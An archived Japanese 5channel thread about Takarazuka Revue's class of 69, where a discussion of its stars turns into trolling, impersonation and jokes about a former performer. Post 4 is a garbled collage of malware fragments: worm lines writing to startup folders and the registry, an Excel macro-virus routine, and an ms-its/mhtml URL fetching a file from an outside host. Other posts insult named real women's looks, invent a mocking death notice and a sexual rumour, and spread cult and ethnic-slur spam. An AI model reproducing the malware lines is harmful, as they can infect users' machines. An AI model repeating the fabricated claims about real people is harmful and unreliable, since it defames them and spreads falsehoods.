5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

歴史に残る☆☆69期を語ろう☆☆スター大量排出

1 :名無しさん@花束いっぱい。:2006/12/13(水) 21:30:27 ID:vlEcpJp4
久世星佳、麻地さき、高嶺ふぶき、若央りさ、海峡ひろき等、
宝塚の歴史に残る偉大なスターを大量に排出した69期について語ろう。

2 :名無しさん@花束いっぱい。:2006/12/13(水) 21:38:41 ID:k1mjSOm/
なんだか荒れそうなふんいきのスレですね。

3 :有名人。@UK:2006/12/13(水) 21:57:29 ID:4gTgs94W
排出って...w


輩出でしょ!

4 :<body onload=window()>:2006/12/13(水) 22:03:29 ID:k+WHojnV
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

5 :名無しさん@花束いっぱい。:2006/12/15(金) 23:34:47 ID:rLcCTeJs
現在の彼女たち
久世星佳(女優)
高嶺ふぶき(女優)
麻路さき(主婦)
海峡ひろき(主婦)
若央りさ(劇団振付師)

6 :名無しさん@花束いっぱい。:2006/12/17(日) 11:16:22 ID:0DKa1ap4
まあ他の期と較べて突出しているというほどではないだろう。
手堅い働きができる有能な人材が多かったようには思うけどね。

7 :名無しさん@花束いっぱい。:2006/12/17(日) 11:22:41 ID:RIojEjFH
神奈美帆もいれてよ〜

8 :釣られてみよう時鳥:2006/12/17(日) 12:32:29 ID:+lQUQCFs
神奈美帆以外は結局小粒で、
71期とともに低迷期をもたらしたという点で意義は大きい。
同期3人娘に続く69、71期の同期トップ――。
一部を除き、あまりにも単純な劇団の戦略の犠牲者とも言えるけど。
地味ぃ〜なノンちゃん、歌唱力が楽しめたマリコ、
トップとしての存在感がここまで希薄?と痛感したユキちゃん。
ある面では画期的だった。でも71期よりまだ存在感はあったかな。

9 :名無しさん@花束いっぱい。:2006/12/17(日) 12:55:27 ID:v1yjUQ7H
たきちゃんも入れてよ〜

10 :絵麻緒ゆう:2006/12/17(日) 20:55:02 ID:eIpw+Wm7
ほんと

やっちゃん以外はくずばっか...

11 :名無しさん@花束いっぱい。:2006/12/17(日) 21:19:16 ID:7Gg4vmke
ここって罵りたいだけのために立てたスレ?

12 :名無しさん@花束いっぱい。:2006/12/17(日) 21:36:54 ID:0DKa1ap4
出雲綾を筆頭にこの期はスターよりも名脇役が多かった期がする。
スター級はたしかに小粒かな。
神奈美帆も早く辞めたからある種の幻想を抱かれているが、
長くいたら恐らくその小粒ぶりが露呈していただろう。

13 :名無しさん@花束いっぱい。:2006/12/17(日) 22:05:46 ID:ZJn34Foo
スレたてる主がいるくらいだから、気になる期なんじゃねえの・・
叩きたくなるほど気になる期なんじゃねえの・・
あげ作業で潰したくなるほど気になる期なんじゃねえの・・


14 :匠ひびき:2006/12/17(日) 22:09:46 ID:eIpw+Wm7
スレたてるほどの期かよ

15 :名無しさん@花束いっぱい。:2006/12/17(日) 22:15:02 ID:ZJn34Foo
さーそれは知らんが構いたいほどの期なんでないの?
きっと目の上のたんこぶだったじゃねえの。
ID:eIpw+Wm7とっては自分の贔屓に邪魔だったとか。



16 :名無しさん@花束いっぱい。:2006/12/17(日) 22:17:22 ID:eIpw+Wm7
『歴史に残る☆☆69期を語ろう☆☆スター大量排出』って

17 :名無しさん@花束いっぱい。:2006/12/17(日) 22:19:13 ID:eIpw+Wm7
『歴史に残る☆☆69期を語ろう☆☆スター大量排出』って
ステキな題名ねェ

愛華みれ、真琴つばさ、轟ゆう、稔幸

18 :名無しさん@花束いっぱい。:2006/12/17(日) 22:21:56 ID:ZJn34Foo
おもしろいくらい構いたくなるアンチID:eIpw+Wm7なんだろうな。
こいつ、自分の贔屓が小粒すぎてやたら69期に押しつぶされ
ちゃったじゃねえの、つうか。
もう、いいやバイバイ。。。もう遊んでやるの飽きたじゃねえの。


19 :名無しさん@花束いっぱい。:2006/12/17(日) 22:25:49 ID:eIpw+Wm7
>おもしろいくらい構いたくなるアンチID:eIpw+Wm7なんだろうな。
>こいつ、自分の贔屓が小粒すぎてやたら69期に押しつぶされ
>ちゃったじゃねえの、つうか。
>もう、いいやバイバイ。。。もう遊んでやるの飽きたじゃねえの。

ごめんなさい

あなたの贔屓が69期にいたってこと 今気がついたわ


20 :名無しさん@花束いっぱい。:2006/12/17(日) 22:29:46 ID:eIpw+Wm7
いや 69期は素晴らしい期だよ

私達、足元にも及ばないわっ

春野、安蘭、朝海、成瀬、花總、汐見

21 :名無しさん@花束いっぱい。:2006/12/17(日) 22:30:17 ID:ZJn34Foo
この書き方あんた久しぶり〜そうか大滝子ファンか?
あの昔スレのランキング基地外か〜
そうかあんたようは69期嫌いだったんか〜
へ〜

22 :名無しさん@花束いっぱい。:2006/12/17(日) 22:33:41 ID:eIpw+Wm7
ほんと お久しぶりねェ

69期のファンだったって...なかなか渋いわねェ
(滅多にいないわ)


23 :名無しさん@花束いっぱい。:2006/12/17(日) 22:36:10 ID:eIpw+Wm7
私達より落ちるけど...

そんなにいじめなさんな

      絵麻緒ゆう 匠ひびき



24 :名無しさん@花束いっぱい。:2006/12/17(日) 22:37:08 ID:ZJn34Foo
ふふそんなこたあねえよ。
大滝子よりは多いじゃねえか?大滝子なんてあんた一人しか
ファンがいないしな、つうか本当は大滝子のファンじゃないだろう。
あんたはただの愉快犯。

25 :名無しさん@花束いっぱい。:2006/12/17(日) 22:39:54 ID:ZJn34Foo
おやすみ〜〜〜なさい。
ID:eIpw+Wm7ご愁傷様〜〜〜ばいばい。。。


26 :69期バンザイ!!:2006/12/17(日) 22:42:20 ID:eIpw+Wm7
余程気に障ったのねぇ...

>あんたはただの愉快犯

このスレの題名の方が余程愉快だわ

わざわざ"つっこんで!!"って言っているようなものよ

27 :69期バンザイ!!:2006/12/17(日) 22:45:07 ID:eIpw+Wm7
69期バンザイ!!

28 :汐風幸:2006/12/17(日) 22:46:34 ID:eIpw+Wm7
このスレは閉鎖されました

29 :名無しさん@花束いっぱい。:2006/12/17(日) 22:57:59 ID:fn7OD0Ko
>1 失礼な奴だな!!!
マリコの名前を間違えるな!

30 :伊織直加:2006/12/17(日) 23:05:26 ID:eIpw+Wm7
このスレは閉鎖されました

31 :名無しさん@花束いっぱい。:2006/12/18(月) 02:33:56 ID:WcTSzTuU
>29
(笑)だから、そもそもアンチがたてたスレなんだろうよ・・・

32 :名無しさん@花束いっぱい。:2006/12/18(月) 11:57:27 ID:2D49hsF8
昔のヅカを語るスレが無くなって寂しい思いをしていたら、
ここであの時の常連さんがお集りになっておられるみたいで嬉しく思います。
また時々顔を出させていただきますね。

33 :朝香じゅん:2006/12/18(月) 21:21:43 ID:xbitJJl6
"歴史に残る☆☆69期を語ろう☆☆スター大量排出"って意味が
やっと判ったワ

この期を境に誰でもトップになれるってトップスターの価値が
大幅に下がったわよね。
昔は宝くじに当たるよりトップになるのは難しいって言われていたのに。

スレの名づけ親、偉いワ

ほんと 歴史に残るぐらい 大量排出ネ!!

便秘気味のクソが大量に出るように おや失礼

34 :名無しさん@花束いっぱい。:2006/12/19(火) 10:42:19 ID:agiX2t1L
まだ69期はだいジョブ。
マジレスしちゃうとこの期じゃないとおも。
71期・72期・73期あたりからじゃないかな〜
詰まるに詰まったスターをどう裁いていいか分からなく
なっていった劇団が右往左往して悪人事に走っちゃった。

35 :名無しさん@花束いっぱい。:2006/12/19(火) 23:35:04 ID:9nrPReuX
おいおい33番の朝香じゅんさんよ。
「昔は宝くじに当たるよりトップになるのは難しいって言われていたのに。」だって?
宝くじなんて10枚買えば1枚は当たるようになってんだよ。
あんたの時代は10人に1人の割合でトップになれたの?




36 :朝香じゅん:2006/12/19(火) 23:38:24 ID:ZhIvNlrt
>おいおい33番の朝香じゅんさんよ。
>「昔は宝くじに当たるよりトップになるのは難しいって言われていたのに。」だって?
>宝くじなんて10枚買えば1枚は当たるようになってんだよ。
>あんたの時代は10人に1人の割合でトップになれたの?

ごめんなさい

あなたのご贔屓も69期だったのね


37 :名無しさん@花束いっぱい。:2006/12/19(火) 23:44:55 ID:9nrPReuX
↑失礼なやつだ。上級生をファン扱いしやがって。

榛名由梨の同期生(成績は彼女より上)

38 :朝香じゅん:2006/12/20(水) 00:02:56 ID:ZhIvNlrt
>↑失礼なやつだ。上級生をファン扱いしやがって。

>榛名由梨の同期生(成績は彼女より上)

ごめんなさい

花小路諄さんだったのね

39 :名無しさん@花束いっぱい。:2006/12/20(水) 21:25:35 ID:hnz8rafs
まらっ、大滝子さん、ぶっさいくな顔でこんなとこにもお出ましなのね。


40 :檀れい:2006/12/20(水) 23:52:51 ID:BzW5Pt8P
大滝子さま

しもじもの汚れた声を聞いてはないませぬ

わたしたちは美しい妖精そのものなのですから

41 :名無しさん@花束いっぱい。:2006/12/21(木) 00:44:31 ID:xigPwHP6
なんで69期を語るスレなのに大滝子が仕切るんだ?

42 :名無しさん@花束いっぱい。:2006/12/21(木) 18:25:02 ID:/DXIVZAZ
朗報

今日未明、元宝塚無理矢理トップの大滝子さんが亡くなられました。
享年88歳、慢性の脱腸が死因。
大滝子さんは現役宝塚時代、数々の団員(下級生)をイビリ倒して主役をもぎ取った
汀夏子さんと並ぶ、歴代宝塚の生徒でも諸悪の根源的存在として有名。
晩年は切痔の悪化と持病の脱腸を併発、醜い顔も老化と共に更に悪化。
看取る近親者もおらず、三軒長屋で一人寂しい最期のようであった。

拍手合掌!

43 :名無しさん@花束いっぱい。:2006/12/22(金) 00:00:46 ID:xigPwHP6
↑いくら匿名での書き込みとはいえちょっとひどすぎないかしら?
 

44 :小林一三:2006/12/22(金) 01:04:06 ID:Uw/143+i
>42

そう 大滝子さまはエンジェルになりました。

ほら 振り返ってごらんなさい

あなたの後ろに...

45 :名無しさん@花束いっぱい。:2006/12/22(金) 16:48:06 ID:ccEwhRLC
↑ お、恐っ !

46 :名無しさん@花束いっぱい。:2006/12/22(金) 19:40:22 ID:Uw/143+i
このスレは 「大滝子を語ろう!」 に変更されました。

             2チャンネル事務局

47 :名無しさん@花束いっぱい。:2006/12/23(土) 00:26:54 ID:XplHwV7c
大滝子さんを語るのはそれはそれで楽しいけど
69期とどのような関係があるのかしら?
是非教えていただきたいわ。
2チャンネル事務局の方、お願いしますね。


48 :名無しさん@花束いっぱい。:2006/12/23(土) 18:28:15 ID:mw8YbXaT
>大滝子さんを語るのはそれはそれで楽しいけど
>69期とどのような関係があるのかしら?
>是非教えていただきたいわ。
>2チャンネル事務局の方、お願いしますね。

お問い合わせ有難うございます。

69期は人気が無く(入りが悪く)採算が合いません。

この為、演目を急遽変更し『大滝子ワンマンショー』と
させて頂きました。

何卒ご理解頂きますようお願い致します。

             2チャンネル事務局        

49 :名無しさん@花束いっぱい。:2006/12/23(土) 19:16:24 ID:xA9VOWLQ
>何卒ご理解頂きますようお願い致します。

理解に苦しみます。

       瀬戸内美八 総勢200万人ファン一同

50 :名無しさん@花束いっぱい。:2006/12/23(土) 19:26:50 ID:mw8YbXaT
>理解に苦しみます。
>瀬戸内美八 総勢200万人ファン一同

ルミ 見苦しいからおやめなさい

       松あきら 総勢5千万人ファン一同

51 :名無しさん@花束いっぱい。:2006/12/23(土) 19:47:15 ID:mw8YbXaT
あら 規模が違うわネ

       安田かまぼこ従業員30人一同

52 :名無しさん@花束いっぱい。:2006/12/23(土) 21:21:37 ID:vUdfWb8Z
若菜あんさんのお子さんももう中学生ぐらいなんだろうね。
もろゆとり教育とか影響世代だけどどうしているかな。

53 :名無しさん@花束いっぱい。:2006/12/23(土) 23:26:11 ID:6AvB7umV
安田かまぼこテラワロスwww

54 :名無しさん@花束いっぱい。:2006/12/23(土) 23:35:13 ID:EsUTjeSJ
>>52
若菜あんなんてマイナーな人よく覚えているわね!
感心だわ。
月組では瞳まりあと歌姫の座をめぐって競っているようなことを言ってたけど
どっちもお顔の醜さが災いしてたわね。
お顔の醜さと言えば、あの期の月組では白原可愛っていうのもいたわね。
歌の上手さでは若菜、瞳をしのいでいたとは思うけど、
3人ともあのお顔では使い道はなかったわね。



55 :名無しさん@花束いっぱい。:2006/12/24(日) 01:17:20 ID:BTtvUNyM
ヤン・ミキの女装よりはマシよっ!

56 :名無しさん@花束いっぱい。:2006/12/24(日) 09:10:00 ID:31fet10H
http://www.yasuda-kamaboko.com/

http://www.wakasaji.org/member/kau_08_yasudakamaboko.html

57 :名無しさん@花束いっぱい。:2006/12/24(日) 11:18:33 ID:RnVxjPo9
>54
白鷺まどかを忘れずに

58 :名無しさん@花束いっぱい。:2006/12/24(日) 15:05:02 ID:31fet10H
「皆さん

イヴの日に大滝子ワンマンショーへようこそ!!

それでは今日わたしと一緒にステージを盛り上げてくれる
バックダンサーを紹介します。

歌唱力抜群の麻路さき
美形の久世星佳、海峡ひろき
長い足の高嶺ふぶき
小顔の若央りさ

そして"華"を添えてくれる
若菜あん、瞳まりあ、白原可愛 

そしてミス69期白鷺まどかで〜す〜

皆この世のものとは思えない69期の面々です。」


59 :名無しさん@花束いっぱい。:2006/12/24(日) 17:40:11 ID:r8xf8ZiT
黛れいなも追加して

60 :名無しさん@花束いっぱい。:2006/12/24(日) 18:07:39 ID:SPokkSSD
>58
ワンマンショーの主役さんにピッタリな配役達だことっ。枯れ木も山の賑わい状態ね。

61 :名無しさん@花束いっぱい。:2006/12/24(日) 18:27:47 ID:PUiKmaer
58のような企画があったら絶対行くぞ〜

62 :名無しさん@花束いっぱい。:2006/12/24(日) 19:12:20 ID:31fet10H
>58のような企画があったら絶対行くぞ〜

『このスレの住民は品が無いから入場させるかどうか...
ちょっと考えさせてもらうワ〜』
と仰っておいでになります。

           大滝子のマネージャー


63 :名無しさん@花束いっぱい。:2006/12/24(日) 19:31:11 ID:ytuxeVXf
特別スペシャルゲスに

大滝子様に負けず劣らずのゲス

汀夏子
榛名由梨
亜美じゅん
早乙女幸
梢真奈美
岸香織
日向薫
安寿ミラ
麻路さき
ひびき美都

をお迎えする予定でおります

皆様のご来場をお待ち致しております

      ホテル東横イン 総支配人  

64 :名無しさん@花束いっぱい。:2006/12/24(日) 19:37:21 ID:31fet10H
すいません。

大滝子さまのワンマンショーは 帝国ホテル 孔雀の間 にて
おこなっております。

尚終演後の花束贈呈は後輩・白城あやかが予定されております。

           大滝子のマネージャー

65 :名無しさん@花束いっぱい。:2006/12/24(日) 20:09:39 ID:ytuxeVXf
>尚終演後の花束贈呈は後輩・白城あやかが予定されております。

妹はクリスマスイヴで大忙しだそうで、無駄な時間を過ごしたくないと申しております。

                            わたくし…沢口靖子

66 :名無しさん@花束いっぱい。:2006/12/24(日) 21:04:35 ID:31fet10H
あら、おかしいわね。白城あやかさんはもうこちらに来ていらっしゃいますわよ。

なんせ初体験の相手が大滝子さまとのことですから。

           大滝子のマネージャーこと紫苑ゆう

67 :名無しさん@花束いっぱい。:2006/12/25(月) 01:39:16 ID:A2goZYni
んで、あやかちゃんって何歳になったんだろ?
もう芸能活動復帰はないのかなぁ
今、♪ジャンプオリエント 観てます
すっごいオーラ 眩いくらいの華やかさ
久々に見とれちゃいました

68 :名無しさん@花束いっぱい。:2006/12/25(月) 13:33:29 ID:vsy14Qez
69のスレであやかのことなど語らないでいただきたいものだわ。

                   大滝子

69 :名無しさん@花束いっぱい。:2006/12/25(月) 23:07:39 ID:EB3zIVTc
その大滝子さんは、69のスレにお出ましということは
69歳なんですか?

70 :名無しさん@花束いっぱい。:2006/12/25(月) 23:38:02 ID:Mrz1I0jf
あら!わたしって何期だったかしら?
            
              大滝子

71 :名無しさん@花束いっぱい。:2006/12/26(火) 00:49:09 ID:lhXi3Qdp
みつえさん、独身ですか?たまに大橋ですれ違いますが、昔ファンでしたとも言えず..恥ずかしいです。


(o^.^o)

72 :名無しさん@花束いっぱい。:2006/12/26(火) 10:11:11 ID:aTrDcGsn
はい独身です、これまでも、そしてこれからも。

              福村光恵

73 :名無しさん@花束いっぱい。:2006/12/26(火) 20:04:03 ID:0QLlEaPV
はい永遠のスターです、これまでも、そしてこれからも。

              大滝子

74 :名無しさん@花束いっぱい。:2006/12/26(火) 22:43:10 ID:Sj58LhOY
大滝子さん、その昔取沙汰された金銭問題は解決したのでしょうか?

75 :名無しさん@花束いっぱい。:2006/12/26(火) 22:53:46 ID:0QLlEaPV
>大滝子さん、その昔取沙汰された金銭問題は解決したのでしょうか?

『ああ(ちょっと照れて)私のチャリティコンサートで集めたお金を
マザーテレサに寄付した件ね』

『当たり前のことをしただけよッ』

76 :名無しさん@花束いっぱい。:2006/12/26(火) 23:02:29 ID:0QLlEaPV
汀夏子さん、近年取沙汰された金銭問題は解決したのでしょうか?

77 :名無しさん@花束いっぱい。:2006/12/27(水) 02:17:03 ID:RH7v5WT7
まあ、とんでもなく大昔の話題(カビの生えたジェンヌ)ですこと。

                 永遠に美しい、私…花總まり

78 :名無しさん@花束いっぱい。:2006/12/27(水) 18:44:22 ID:gEHZvJ2m
>まあ、とんでもなく大昔の話題(カビの生えたジェンヌ)ですこと。

永遠に厚化粧の女…花總まり

お前さんのスッピン見せてみな

           素顔美人 光あけみ

79 :名無しさん@花束いっぱい。:2006/12/27(水) 18:48:37 ID:gEHZvJ2m
>永遠に厚化粧の女…花總まり
>お前さんのスッピン見せてみな
>           素顔美人 光あけみ

すんません 

うちの旦那がこんなところに顔出して

            轟悠

80 :伊織直加 :2006/12/28(木) 21:11:58 ID:yyOYlJ0e
このスレは閉鎖されました

81 :名無しさん@花束いっぱい。:2006/12/28(木) 21:24:18 ID:hGdq7Ggi
69期を語るスレがこんな展開になるとは・・・
69期の主席卒業生としてとても複雑な気持ちです。

                倉本多紀

82 :伊織直加 :2006/12/28(木) 21:51:26 ID:yyOYlJ0e
倉本多紀さん。

あなたのその"美しさが"この結果を招いたの。

どう責任とられるつもり?

83 :名無しさん@花束いっぱい。:2006/12/28(木) 22:10:14 ID:hGdq7Ggi
ごめんなさい。

でも、私より美しい白鷺まどか、白原可愛、
瞳まりあ、若菜あんなどの責任問題はどうなるのかしら?

84 :伊織直加 :2006/12/28(木) 22:17:56 ID:yyOYlJ0e
あなたが一番美しいわっ!!

85 :名無しさん@花束いっぱい。:2006/12/28(木) 22:24:32 ID:yyOYlJ0e
そう?

そこまで言うなら倉本多紀から美の女神
大多紀子に改名しようかしら...

                倉本多紀

86 :名無しさん@花束いっぱい。:2006/12/28(木) 22:29:40 ID:sW1rs1xu
若菜あんちゃんは、素顔かわいかったよん。


87 :名無しさん@花束いっぱい。:2006/12/28(木) 22:44:40 ID:yyOYlJ0e
わたしも素顔かわいかったよん。
http://www.sankei.co.jp/enak/sumirestyle/2005/jul/jpeg/14fuchan.jpg

            ふづき美世



88 :名無しさん@花束いっぱい。:2006/12/29(金) 23:11:07 ID:CshT1kAy
このスレは閉鎖されました

89 :名無しさん@花束いっぱい。:2006/12/29(金) 23:57:54 ID:VUT4Lscr
あまり気付いてませんでしたけど....
言われてみると、若菜あん、白原可愛、瞳まりあなど
69期月組の娘役は豪華なブス揃いですこと。

90 :名無しさん@花束いっぱい。:2006/12/30(土) 00:06:52 ID:G8/n+9sv
仰る通り...いい迷惑だわ
                倉本多紀

91 :名無しさん@花束いっぱい。:2006/12/30(土) 00:14:13 ID:G8/n+9sv
わたしも

同じジェンヌとして恥ずかしいわ

http://www.sankei.co.jp/enak/sumirestyle/2005/jul/jpeg/14fuchan.jpg

92 :名無しさん@花束いっぱい。:2006/12/30(土) 13:07:08 ID:ujYcX5oY
69期月組の男役は美男揃いだったぞ!
久世星佳、若央りさ、美輪さいこ、そして麻地さきも確か月じゃなかった?

93 :名無しさん@花束いっぱい。:2006/12/30(土) 16:47:40 ID:PQye05Td
麻地さきだれでしょう???

94 ::2006/12/30(土) 17:58:24 ID:G8/n+9sv
>麻地さきだれでしょう???

ほら あの麻地さきさんですよ。

歌唱力の卓越した...

>69期月組の男役は美男揃いだったぞ!

久世星佳、海峡ひろき...確かに ブ形揃いね


95 :宝塚は創価学会の巣:2006/12/30(土) 18:27:20 ID:hD1HZw1h
半島カルトの異常性と特異性!宝塚は創価学会の巣
日本人なら、目を覚ましなさい。危ないですよ。
http://specialnotes.blog77.fc2.com/

96 :名無しさん@花束いっぱい。:2006/12/30(土) 18:40:29 ID:+33G9blh
私は花組の69期に付いてた…友麻夏希、聖真澄、真弓しずか、愛風ひかる、曙真八、紫峰さぎり、麻生由美、翠章江…あとだれだっけ??

97 ::2006/12/30(土) 21:52:55 ID:G8/n+9sv
このスレは閉鎖されました

98 :名無しさん@花束いっぱい。:2006/12/30(土) 22:58:42 ID:ujYcX5oY
私は雪組の69期に取り付かれていた…白鷺まどか…あとだれだっけ??

99 :名無しさん@花束いっぱい。:2006/12/31(日) 04:58:52 ID:aQtg1Nxk
高嶺ふぶき、美月亜優

100 :名無しさん@花束いっぱい。:2006/12/31(日) 10:39:03 ID:pQzkFBO2
>>93
麻地さきって69期の中では結構有名な方では?

101 :名無しさん@花束いっぱい。:2006/12/31(日) 14:40:54 ID:RiqBbBH6
はあ〜有名ですけど・・まりこさんは。
麻地は知らんです。

102 :名無しさん@花束いっぱい。:2006/12/31(日) 15:40:51 ID:E+G4caDv
麻路さきは知ってるけど。
麻地さきは知らんってことだ。

103 :名無しさん@花束いっぱい。:2007/01/01(月) 01:11:16 ID:UaYBOEep
麻路だったんですか?
ってことはスレ主が間違ってるわけですか?

104 :名無しさん@花束いっぱい。:2007/01/02(火) 12:02:34 ID:Wcl3W8H8
あら年が明けたっていうのに・・・
大滝子さんの新年のご挨拶がないわね。
お元気なのかしら?

105 :名無しさん@花束いっぱい。:2007/01/02(火) 14:49:12 ID:6te6wwb6
大滝子さんは、同棲中の白鷺まどかさんと元旦から新春ホテルディナーショウやってたらしいわよ。

昨日、金沢駅前のAPAホテルからまどかさんと連れ立って出てくるの見かけたわ。

106 :名無しさん@花束いっぱい。:2007/01/02(火) 15:55:22 ID:29p7zxOV
大滝子さん、劇団からOG扱いされてませんが、そのあたりのことは
どのように感じてらっしゃるのでしょうか?

107 ::2007/01/02(火) 21:03:14 ID:cg6MH0kX
>大滝子さんは、同棲中の白鷺まどかさんと元旦から新春ホテルディナーショウやってたらしいわよ。
>昨日、金沢駅前のAPAホテルからまどかさんと連れ立って出てくるの見かけたわ。

>大滝子さん、劇団からOG扱いされてませんが、そのあたりのことは
>どのように感じてらっしゃるのでしょうか?

さすが 『大滝子を語るスレ』ねっ!!



108 :名無しさん@花束いっぱい。:2007/01/02(火) 22:22:57 ID:cg6MH0kX
大滝子さまは第二の春日野八千代と目されながら、歌劇団の反対を押し切って
退団なさいました。
ものすごい人気に「普通の女の子に戻りたい」と泣きじゃくっていた
愛くるしい姿が今でも脳裏に焼きついています。

千秋楽には退団を惜しむファンの列が大劇場出口から宝塚大橋を抜け西宮北口まで
続いたようです。
この模様はニューヨークタイムズにも『少女歌劇ドル箱スター失う』と
報じられました。

どうもこの時の歌劇団との確執が根深くOG扱いされない大きな理由と思われます。

109 :名無しさん@花束いっぱい。:2007/01/03(水) 11:31:26 ID:8+ro8Sph
大滝愛子先生はまだお元気かしら?

110 :名無しさん@花束いっぱい。:2007/01/03(水) 13:27:50 ID:UpMvybFS
大滝子さんは吉本興業第二の中山美保と目されていたから、歌劇団の早期退団懇願をごり押しで居座られ、
惜しむ関係者・ファンもなく、劇団史上最大の恥部トップで退団なさいました。
稀にもみない醜い容姿に、さすがの厚顔無恥の大滝子さんも「せめて普通の女並の容姿になりたい」と
日美クリニックの扉を叩いたという逸話は今でも脳裏に焼きついています。

千秋楽には退団を惜しむ親族らの“大ちゃんコール”が虚しく響きわたり、付近の住人や温泉街のお客達の
苦情が殺到、通報で駆けつけた保健所の職員に親族諸共拘束された様子が、翌月の町内たよりに一行掲載された模様です。

後に、・・事件で吉本興業への本格的舞台復帰も辞退を余儀なくされ、現在は”こずえ&みどり”路線で
後輩であり共通点も多い白鷺まどかさんと、各地の温泉街ドサまわりの日々を過ごされているそうです。

どうもこと時の吉本興業への執念が根強くあり、舞台女優へ復帰されない大きな理由と思われます。



111 :名無しさん@花束いっぱい。:2007/01/03(水) 22:19:42 ID:FmWKGpL+
このスレは閉鎖されました

112 :名無しさん@花束いっぱい。:2007/01/03(水) 23:31:28 ID:G0WArPnH
あら勝手に閉鎖しないで!
ここは69期の全ブス連と大滝子様のファンが親睦を深める大切なスレよ。

113 :名無しさん@花束いっぱい。:2007/01/03(水) 23:56:52 ID:+eRX7PEL
あらぁ〜、真剣に「あたい、大滝子さんの大ファンなのよねぇ〜」って人、いないと思うんだけど…

因みにわたくしは、朝香じゅん様と涼風真世様、マオリ様のファンでございましたのよ

ってか、歌えるジェンヌが好きなだけなんだけどねっ

114 :名無しさん@花束いっぱい。:2007/01/04(木) 00:34:29 ID:zDRZgIKu
歌えるジェンヌが好きだって?
誰だって歌えるよ。
あの麻痔さきでさえ歌ってた。

ただ、大滝子の歌はなんともしびれる....
いったいここに出没している中でどれくらいの者が彼女の歌をライブで聴いたんだ?

115 :名無しさん@花束いっぱい。:2007/01/04(木) 00:40:04 ID:qW/bVYPb
大滝子のライブなんて聴きに行く暇はないんだけどね。
とにかくフェルゼン時の歌と台詞は酷いもんだったことだけは覚えてるよ。

116 :名無しさん@花束いっぱい。:2007/01/04(木) 00:44:11 ID:VnBb0gi2
私は大滝子さまに憧れてヅカを受験しました

                 白城あやか

117 :名無しさん@花束いっぱい。:2007/01/04(木) 01:34:38 ID:5GLv408i
大滝子さんの舞台はテレビで見たベルばらしか存じ上げませんが、
なぜあのように口を尖らせてモゴモゴした口調でセリフを言ってたのでしょうか?
大滝子さんはいつもあのような演技だったのでしょうか?

118 :名無しさん@花束いっぱい。:2007/01/04(木) 05:30:16 ID:J+FMseXp
歌舞伎大根役者のような台詞廻しだった=大滝子
特にベルばらの「王妃さま〜」の台詞が見てるこっちが恥ずかしいくらい変(下手)だった。
初演から平成(再演し過ぎネ)のフェルゼン役でダントツの下手糞さだと思う。
そもそも王妃様と不倫出来る様な容姿じゃなかったものね。
大浦みずきさんもかなりの容姿だったけど舞台化粧映えはピカイチでしたね。

119 :名無しさん@花束いっぱい。:2007/01/04(木) 07:41:59 ID:VnBb0gi2
それでも私は大滝子さまに憧れてヅカを受験しました

                 白城あやか

120 :名無しさん@花束いっぱい。:2007/01/04(木) 10:46:52 ID:py6XXJLX
あらそうかしら・・・・
大滝子さん、容姿のぶっさいくさはともかく
ベルばらの演技は長谷川一夫先生の指導に忠実で
よかったと思うけど
それと歌もなかなかきかせてたわよ...

121 :名無しさん@花束いっぱい。:2007/01/04(木) 17:18:55 ID:qW/bVYPb
>特にベルばらの「王妃さま〜」の台詞が見てるこっちが恥ずかしいくらい変(下手)だった。

わたしもおんなじこと思ってた。なんでそんなに固まった台詞回しなのって。
長谷川先生はそんな指導されてたのかしら?
史上最悪かどうかは分からないけど、容姿の醜さとスタイルの悪さは認めざるを得ないでしょう。

122 :名無しさん@花束いっぱい。:2007/01/04(木) 18:36:07 ID:VnBb0gi2
それでも私は大滝子さまに憧れてヅカを受験しました

                 白城あやか

123 :名無しさん@花束いっぱい。:2007/01/04(木) 19:30:47 ID:FXd/RzQ2
なんか、あやちゃんが不憫な気がする‥

124 :名無しさん@花束いっぱい。:2007/01/04(木) 19:42:38 ID:VnBb0gi2
やっぱり私は大滝子さまに憧れてヅカを受験しました

                 白城あやか

125 :名無しさん@花束いっぱい。:2007/01/04(木) 19:44:52 ID:VnBb0gi2
実は私も大滝子さまに憧れてヅカを受験しました

                 神奈美帆


126 :名無しさん@花束いっぱい。:2007/01/04(木) 19:55:26 ID:VnBb0gi2
私は光あけみさんの男っぷりに引かれて養子に入りました

                 轟悠


127 :名無しさん@花束いっぱい。:2007/01/04(木) 19:55:36 ID:FXd/RzQ2
あやちゃん、やっちゃんじゃなくて、りんごさんあたりで我慢してくれないかしら?

128 :名無しさん@花束いっぱい。:2007/01/04(木) 19:57:55 ID:VnBb0gi2
私は大滝子さまに憧れて”大”の一文字を芸名にいただきました

                 大輝ゆう


129 :名無しさん@花束いっぱい。:2007/01/04(木) 20:24:45 ID:VnBb0gi2
>私は大滝子さまに憧れて”大”の一文字を芸名にいただきました

私もそうよ

                 大地真央

130 :名無しさん@花束いっぱい。:2007/01/05(金) 00:40:43 ID:eBIxG80i
私もそうよ

            松坂大輔

131 :名無しさん@花束いっぱい。:2007/01/05(金) 07:35:37 ID:+suP5sXg
私は大滝子さまに憧れて”子”の一文字をいただきました

                 松嶋菜々子

132 :名無しさん@花束いっぱい。:2007/01/05(金) 16:17:04 ID:eBIxG80i
